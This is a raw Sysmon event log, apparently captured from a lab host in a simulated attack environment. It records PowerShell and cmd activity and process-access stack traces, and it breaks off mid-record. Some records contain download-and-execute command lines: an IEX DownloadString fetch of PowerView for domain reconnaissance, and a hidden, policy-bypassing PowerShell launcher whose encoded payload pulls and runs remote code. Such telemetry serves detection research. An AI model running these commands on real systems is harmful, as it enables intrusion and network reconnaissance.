Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72AE926C51C7D678F12245B0BE0CCB0D,SHA256=88CF5C08D021CD12FEF7CCB33DB63169A2EC64B43DC05831D1E3BD1F8E8F9C22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.709{B81B27B7-4013-611D-1600-00000000C801}11967116C:\Windows\system32\svchost.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.709{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.662{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.662{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000035086178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-09 18:18:27.640{B81B27B7-4FF3-613A-8190-03000000C801}5504\PSHost.132756851075702062.5504.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035086177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.625{B81B27B7-4FF3-613A-8190-03000000C801}5504ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_hmtsm23t.cms.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.625{B81B27B7-4FF3-613A-8190-03000000C801}5504ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_ftkq0y2l.nbq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000035086175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.609{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_ftkq0y2l.nbq.ps12021-09-09 18:18:27.609 10341000x800000000000000035086174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.593{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4FF3-613A-8090-03000000C801}6072612C:\Windows\system32\cmd.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.570{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -C "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.16:8000/PowerView.ps1');Get-DomainController"C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-4FF3-613A-8090-03000000C801}6072C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe -C "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.16:8000/PowerView.ps1');Get-DomainController" 10341000x800000000000000035086165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4FF3-613A-8090-03000000C801}6072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-4FF3-613A-8090-03000000C801}6072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4FF3-613A-8090-03000000C801}6072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035086158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.562{B81B27B7-4FF3-613A-8090-03000000C801}6072C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe -C "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.16:8000/PowerView.ps1');Get-DomainController"C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035086157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:27.260{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1532665B326CDD69C54F05E1E7D5453C,SHA256=B8F4C811DB996A5F22A35381DC302A4FE4D99DE0DC0D716966839960047B5FF9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.992{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FF4-613A-8390-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 